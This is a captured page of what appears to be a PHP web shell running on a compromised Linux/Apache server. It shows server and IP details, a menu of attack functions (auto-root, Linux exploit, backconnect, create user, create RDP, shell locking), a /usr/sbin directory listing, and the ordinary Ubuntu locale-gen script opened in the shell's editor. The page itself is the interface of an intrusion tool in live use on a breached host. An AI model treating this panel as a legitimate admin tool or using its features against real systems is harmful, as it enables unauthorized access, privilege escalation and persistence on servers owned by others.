Linux 00830bc4dc40 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4
: 172.19.0.2 | : 216.73.217.74
Cant Read [ /etc/named.conf ]
7.4.33
flexusfire
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
sbin /
[ HOME SHELL ]
Name
Size
Permission
Action
add-shell
860
B
-rwxr-xr-x
addgnupghome
3
KB
-rwxr-xr-x
addgroup
36.9
KB
-rwxr-xr-x
adduser
36.9
KB
-rwxr-xr-x
agetty
67.38
KB
-rwxr-xr-x
applygnupgdefaults
2.17
KB
-rwxr-xr-x
badblocks
34.32
KB
-rwxr-xr-x
blkdiscard
34.23
KB
-rwxr-xr-x
blkid
118.26
KB
-rwxr-xr-x
blkzone
70.23
KB
-rwxr-xr-x
blockdev
66.23
KB
-rwxr-xr-x
cfdisk
102.59
KB
-rwxr-xr-x
chcpu
46.23
KB
-rwxr-xr-x
chgpasswd
66.2
KB
-rwxr-xr-x
chmem
62.23
KB
-rwxr-xr-x
chpasswd
58.2
KB
-rwxr-xr-x
chroot
42.34
KB
-rwxr-xr-x
cpgr
60.34
KB
-rwxr-xr-x
cppw
60.34
KB
-rwxr-xr-x
ctrlaltdel
38.23
KB
-rwxr-xr-x
debugfs
225.8
KB
-rwxr-xr-x
delgroup
16.11
KB
-rwxr-xr-x
deluser
16.11
KB
-rwxr-xr-x
dpkg-preconfigure
3.58
KB
-rwxr-xr-x
dpkg-reconfigure
4.34
KB
-rwxr-xr-x
dumpe2fs
30.38
KB
-rwxr-xr-x
e2freefrag
18.38
KB
-rwxr-xr-x
e2fsck
327.21
KB
-rwxr-xr-x
e2image
42.38
KB
-rwxr-xr-x
e2label
106.55
KB
-rwxr-xr-x
e2mmpstatus
30.38
KB
-rwxr-xr-x
e2scrub
7.13
KB
-rwxr-xr-x
e2scrub_all
5.27
KB
-rwxr-xr-x
e2undo
22.38
KB
-rwxr-xr-x
e4crypt
30.38
KB
-rwxr-xr-x
e4defrag
34.3
KB
-rwxr-xr-x
faillock
14.15
KB
-rwxr-xr-x
fdformat
34.23
KB
-rwxr-xr-x
fdisk
150.27
KB
-rwxr-xr-x
filefrag
18.33
KB
-rwxr-xr-x
findfs
14.23
KB
-rwxr-xr-x
fsck
54.27
KB
-rwxr-xr-x
fsck.cramfs
38.26
KB
-rwxr-xr-x
fsck.ext2
327.21
KB
-rwxr-xr-x
fsck.ext3
327.21
KB
-rwxr-xr-x
fsck.ext4
327.21
KB
-rwxr-xr-x
fsck.minix
122.25
KB
-rwxr-xr-x
fsfreeze
14.23
KB
-rwxr-xr-x
fstab-decode
14.3
KB
-rwxr-xr-x
fstrim
70.23
KB
-rwxr-xr-x
getty
67.38
KB
-rwxr-xr-x
groupadd
90.95
KB
-rwxr-xr-x
groupdel
86.77
KB
-rwxr-xr-x
groupmems
62.24
KB
-rwxr-xr-x
groupmod
94.86
KB
-rwxr-xr-x
grpck
62.18
KB
-rwxr-xr-x
grpconv
58.05
KB
-rwxr-xr-x
grpunconv
58.05
KB
-rwxr-xr-x
hwclock
102.35
KB
-rwxr-xr-x
iconvconfig
30.4
KB
-rwxr-xr-x
initctl
17
B
-rwxr-xr-x
installkernel
2.58
KB
-rwxr-xr-x
invoke-rc.d
16.64
KB
-rwxr-xr-x
isosize
30.23
KB
-rwxr-xr-x
killall5
26.38
KB
-rwxr-xr-x
ldattach
34.23
KB
-rwxr-xr-x
ldconfig
387
B
-rwxr-xr-x
ldconfig.real
1
MB
-rwxr-xr-x
locale-gen
4.3
KB
-rwxr-xr-x
logsave
14.16
KB
-rwxr-xr-x
losetup
110.34
KB
-rwxr-xr-x
mailshield.sh
143
B
-rwxr-xr-x
mke2fs
134.62
KB
-rwxr-xr-x
mkfs
14.23
KB
-rwxr-xr-x
mkfs.bfs
34.23
KB
-rwxr-xr-x
mkfs.cramfs
42.16
KB
-rwxr-xr-x
mkfs.ext2
134.62
KB
-rwxr-xr-x
mkfs.ext3
134.62
KB
-rwxr-xr-x
mkfs.ext4
134.62
KB
-rwxr-xr-x
mkfs.minix
106.23
KB
-rwxr-xr-x
mkhomedir_helper
22.17
KB
-rwxr-xr-x
mklost+found
14.3
KB
-rwxr-xr-x
mkswap
106.23
KB
-rwxr-xr-x
newusers
98.8
KB
-rwxr-xr-x
nologin
14.3
KB
-rwxr-xr-x
pam-auth-update
19.86
KB
-rwxr-xr-x
pam_extrausers_chkpwd
42.16
KB
-rwxr-sr-x
pam_extrausers_update
42.16
KB
-rwxr-xr-x
pam_getenv
2.82
KB
-rwxr-xr-x
pam_tally
14.16
KB
-rwxr-xr-x
pam_tally2
18.16
KB
-rwxr-xr-x
pam_timestamp_check
14.15
KB
-rwxr-xr-x
paperconfig
4.07
KB
-rwxr-xr-x
pivot_root
14.23
KB
-rwxr-xr-x
policy-rc.d
19
B
-rwxr-xr-x
pwck
58.17
KB
-rwxr-xr-x
pwconv
54.05
KB
-rwxr-xr-x
pwunconv
54.05
KB
-rwxr-xr-x
raw
14.23
KB
-rwxr-xr-x
readprofile
22.26
KB
-rwxr-xr-x
remove-shell
904
B
-rwxr-xr-x
resize2fs
66.38
KB
-rwxr-xr-x
rmt
58.55
KB
-rwxr-xr-x
rmt-tar
58.55
KB
-rwxr-xr-x
rtcwake
46.23
KB
-rwxr-xr-x
runuser
66.23
KB
-rwxr-xr-x
samba_kcc
11.9
KB
-rwxr-xr-x
service
9.04
KB
-rwxr-xr-x
sfdisk
138.23
KB
-rwxr-xr-x
shadowconfig
885
B
-rwxr-xr-x
start-stop-daemon
47.32
KB
-rwxr-xr-x
sulogin
50.23
KB
-rwxr-xr-x
swaplabel
18.23
KB
-rwxr-xr-x
swapoff
22.23
KB
-rwxr-xr-x
swapon
50.23
KB
-rwxr-xr-x
switch_root
14.23
KB
-rwxr-xr-x
sysctl
30.23
KB
-rwxr-xr-x
tarcat
936
B
-rwxr-xr-x
tune2fs
106.55
KB
-rwxr-xr-x
tzconfig
106
B
-rwxr-xr-x
unix_chkpwd
42.15
KB
-rwxr-sr-x
unix_update
42.15
KB
-rwxr-xr-x
update-ca-certificates
5.29
KB
-rwxr-xr-x
update-gsfontmap
470
B
-rwxr-xr-x
update-java-alternatives
3.09
KB
-rwxr-xr-x
update-locale
2.99
KB
-rwxr-xr-x
update-mime
9.18
KB
-rwxr-xr-x
update-passwd
34.56
KB
-rwxr-xr-x
update-rc.d
16.76
KB
-rwxr-xr-x
useradd
143.71
KB
-rwxr-xr-x
userdel
98.89
KB
-rwxr-xr-x
usermod
139.49
KB
-rwxr-xr-x
validlocale
1.73
KB
-rwxr-xr-x
vigr
68.55
KB
-rwxr-xr-x
vipw
68.55
KB
-rwxr-xr-x
wipefs
46.23
KB
-rwxr-xr-x
zic
62.29
KB
-rwxr-xr-x
zramctl
114.34
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : locale-gen
#!/bin/bash set -e LOCALEGEN=/etc/locale.gen LOCALES=/usr/share/i18n/locales USER_LOCALES=/usr/local/share/i18n/locales SUPPORTED=/var/lib/locales/supported.d ALIASES=/usr/share/locale/locale.alias if [ -n "$POSIXLY_CORRECT" ]; then unset POSIXLY_CORRECT fi [ -f $LOCALEGEN ] || exit 0; [ -s $LOCALEGEN ] || exit 0; KEEP= IS_LANG=no ARCHIVE=yes # Handle command-line options prev= while true do option="$1" if [ -n "$prev" ]; then eval "$prev=\$option" prev= continue fi case $option in -h|--help) cat <<EOT Usage: locale-gen [OPTIONS] Options: -h, --help display this message and exit --purge remove existing locales before processing --archive store compiled locale data inside a single archive --no-archive do not store compiled locale data inside a single archive (default) --aliases=FILE read locale aliases from FILE. (Default: /etc/locale.alias) --lang treat argument as generic language code EOT exit 0 ;; --purge) # This is the default when called without arguments ;; --no-purge) KEEP=1 ;; --archive) ARCHIVE=yes ;; --no-archive) ARCHIVE=no ;; --keep-existing) KEEP=1 ;; --aliases) prev=ALIASES ;; --aliases=*) ALIASES=$(expr "x$option" : 'x[^=]*=\(.*\)') ;; --lang) IS_LANG=yes ;; --*) echo "locale-gen: invalid option -- $option" echo "Try 'locale-gen --help' for more information." exit 1 ;; *) break ;; esac shift done no_archive= [ "$ARCHIVE" = yes ] || no_archive="--no-archive" locale_alias= [ -n "$ALIASES" ] && [ -r "$ALIASES" ] && locale_alias="-A $ALIASES" if [ -z "$1" ] && [ -z "$KEEP" ]; then # Remove all old locale dir and locale-archive before generating new # locale data. rm -rf /usr/lib/locale/locale-archive || true for dir in /usr/lib/locale/*; do [ -e "$dir" ] || continue if [ "${dir#/usr/lib/locale/}" = C.UTF-8 ]; then # owned by libc-bin continue fi rm -rf "$dir" 2>/dev/null || true done fi umask 022 is_entry_ok() { if [ -n "$locale" -a -n "$charset" ] ; then true else echo "error: Bad entry '$locale $charset'" false fi } add_to_locale_gen() { echo "$1" | while read locale; do if ! grep -q "^[# ]*$locale *\$" $LOCALEGEN; then echo "# $locale" >> $LOCALEGEN fi sed -i -e "0,/^[# ]*$locale *$/ s/^[# ]*$locale *$/$locale/" $LOCALEGEN done } if [ -z "$1" ]; then GENERATE="`cat $SUPPORTED/* $LOCALEGEN 2>/dev/null || true`" else GENERATE= while [ -n "$1" ]; do if [ -f "$SUPPORTED/$1" ]; then GENERATE="$GENERATE\n`cat $SUPPORTED/$1`" elif [ $IS_LANG = no ] && L=`grep "^${1/%.utf8/.UTF-8} " /usr/share/i18n/SUPPORTED`; then # convert utf8 to UTF-8 and check if the requested locale exists GENERATE="$GENERATE\n$L" add_to_locale_gen "$L" elif [ $IS_LANG = no ] && L=`grep "^${1%.[uU][tT][fF]*} UTF-8" /usr/share/i18n/SUPPORTED`; then # recognize 'll_CC.UTF-8' or 'll_CC.utf8' as ll_CC without codeset GENERATE="$GENERATE\n$L" add_to_locale_gen "$L" else # try to come up with a sensible default L=`grep -E "^${1}( |[._@][^[:space:]]* )UTF-8" /usr/share/i18n/SUPPORTED || true` if [ -z "$L" ]; then echo "Error: '$1' is not a supported language or locale" >&2 exit 1 fi GENERATE="$GENERATE\n$L" add_to_locale_gen "$L" fi shift done fi echo "Generating locales (this might take a while)..." echo -e "$GENERATE" | sort -u | while read locale charset; do \ case $locale in \#*) continue;; "") continue;; esac; \ is_entry_ok || continue if [ "$KEEP" ] && PERL_BADLANG=0 perl -MPOSIX -e \ 'exit 1 unless setlocale(LC_ALL, $ARGV[0])' "$locale"; then continue fi echo -n " `echo $locale | sed 's/\([^.\@]*\).*/\1/'`"; \ echo -n ".$charset"; \ echo -n `echo $locale | sed 's/\([^\@]*\)\(\@.*\)*/\2/'`; \ echo -n '...'; \ if [ -f $USER_LOCALES/$locale ] ; then input=$USER_LOCALES/$locale elif [ -f $LOCALES/$locale ]; then input=$locale else input=`echo $locale | sed 's/\([^.]*\)[^@]*\(.*\)/\1\2/'` if [ -f $USER_LOCALES/$input ]; then input=$USER_LOCALES/$input fi fi localedef $no_archive -i $input -c -f $charset $locale_alias $locale || :; \ echo ' done'; \ done echo "Generation complete."
Close